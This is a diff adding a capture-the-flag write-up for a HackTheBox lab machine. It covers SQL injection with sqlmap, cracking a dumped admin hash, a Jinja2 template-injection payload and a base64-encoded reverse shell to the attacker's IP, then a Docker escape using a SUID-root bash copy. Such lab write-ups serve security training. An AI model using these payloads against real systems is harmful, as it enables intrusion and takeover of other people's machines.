add: writeup-ctf

content/writeup-ctf/writeup-goodgames-htb/index.md

@@ -0,0 +1,208 @@
+---
+title: "Writeup - GoodGames (HTB)"
+date: 2022-03-19
+slug: "writeup-goodgames-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [GoodGames](https://app.hackthebox.com/machines/GoodGames) machine from the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV 10.10.11.130
+```
+One TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 80/tcp : HTTP web server (Apache 2.4.51)
+
+![](img/image-2.webp)
+
+## Exploit
+
+I start by listing the pages accessible through the website.
+
+![](img/image-3.webp)
+
+There are a number of pages, but 3 are pages with a form: login, forgot-password and signup. With a form we can potentially make SQL injection.
+
+First I get a login request via Burp.
+
+
+```bash
+POST /login HTTP/1.1
+Host: 10.10.11.130
+Content-Length: 36
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://10.10.11.130
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://10.10.11.130/
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+email=test%40test.fr&password=azerty
+```
+I save this request in a "request.txt" file, then I run SQLmap to determine if this form is injection sensitive.
+
+
+```bash
+sqlmap -r request.txt
+```
+This form is usable, so I use the following command to list the accessible databases:
+
+
+```bash
+sqlmap -r request.txt --dbs
+[...]
+[12:51:20] [INFO] retrieved: main
+available databases [2]:
+[*] information_schema
+[*] main
+[...]
+```
+I select the database "main" and start to list the different tables.
+
+
+```bash
+sqlmap -r request.txt -D main --dump
+[...]
+[12:53:58] [INFO] retrieved: blog
+[12:54:30] [INFO] retrieved: blog_comments
+[12:55:51] [INFO] retrieved: user
+[12:56:20] [INFO] fetching columns for table 'blog' in database 'main'
+[12:56:20] [INFO] retrieved: 15
+[...]
+```
+I select the "user" table and run the following command to dump the data.
+
+
+```bash
+sqlmap -r request.txt -D main -T user --dump
+[...]
+admin@goodgames.htb
+[13:00:19] [INFO] retrieved: 1
+[13:00:23] [INFO] retrieved: admin
+[13:00:42] [INFO] retrieved: 2b22337f218b2d82dfc3b6f77e7cb8ec
+[...]
+```
+Ok, we have the credentials of the admin user! We just need to get the password hash and run john to decrypt it.
+
+![](img/image-4.webp)
+
+John quickly finds the password: superadministrator.
+
+I can now connect and access the admin panel. This panel is accessible via a subdomain, so I add it in my /etc/hosts file:
+
+
+```bash
+10.10.11.130	internal-administration.goodgames.htb
+```
+I fill in the credentials I found before and connect to the admin panel of the site.
+
+![](img/image-5.webp)
+
+In this panel I find a tab where I can customize the account nickname. Let's determine the PHP template used by the site. For that I use the following github:
+
+[PayloadsAllTheThings/README.md at master · swisskyrepo/PayloadsAllTheThingsA list of useful payloads and bypass for Web Application Security and Pentest/CTF - PayloadsAllTheThings/README.md at master · swisskyrepo/PayloadsAllTheThings![](https://github.com/fluidicon.png)
+
+{{< github repo="swisskyrepo/PayloadsAllTheThings" >}}
+
+
+
+Quickly I determine that the site uses the Jinja2 Template. I will be able to use an injection to execute commands on the server. For that I use the following injection:
+
+```bash
+{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
+
+```
+To make a shell reversel it's a bit more complex, I didn't manage to put just the command, so I use the base64 method to avoid that the command is modified during the process.
+
+To do this I encode my reverse in base64 then I use the following injection to transmit it on the remote server:
+
+
+```bash
+{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40LzEyMzQgMD4mMQo=" | base64 -d | bash').read() }}
+```
+![](img/image-6.webp)
+
+I now have a root shell (I think we are in a docker) and I can get the first flag.
+
+
+```bash
+root@3a453ab39d3d:/home/augustus# ls
+user.txt
+root@3a453ab39d3d:/home/augustus# cat user.txt
+dec6a8b304bbe0fdfe4b8c46a3562605
+```
+## Privilege escalation
+
+As said before, I think we are in a docker. What I can confirm after some research.
+
+After checking my IP, we can safely say that the IP of the host is 172.19.0.1.
+
+![](img/image-7.webp)
+
+So I do an nmap scan on the host IP:
+
+![](img/image-8.webp)
+
+The SSH port is open! We can now try to connect to the user augustus to exit the docker.
+
+I first upgrade my reverse shell with the following command (this is very important for the following).
+
+
+```bash
+python -c 'import pty; pty.spawn("/bin/bash")'
+```
+I am doing an SSH on the user augustus using the password previously used:
+
+![](img/image-9.webp)
+
+I am now in the host machine, interesting thing I notice the nmap file I uploaded in the docker is present in the folder of augustus. But what is even more interesting is that he has kept his root privilege!
+
+![](img/image-10.webp)
+
+What I will be able to do is to make a copy of bash. Then in the docker add the execution rights. Then go back to the host and create a bash root.
+
+To do this, I first copy the bash file from the host machine into the augustus folder:
+
+
+```bash
+cp /bin/bash ./
+
+```
+Then I go back to the docker and add the following rights:
+
+
+```bash
+chown root:root bash
+chmod 4777 bash
+```
+Finally I go back to the host and run a bash root:
+
+
+```bash
+augustus@GoodGames:~$ ./bash -p
+bash-5.1# cat /root/root.txt
+cat /root/root.txt
+702332b6faa16ef1b87c5ae52a2ef3df
+```
+I now have control of the host machine and can recover the last flag.
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Patch forms to avoid sql injection
+- Use strong passwords
+- Do not use the same password for two different services
+- Do not launch dockers with root privilege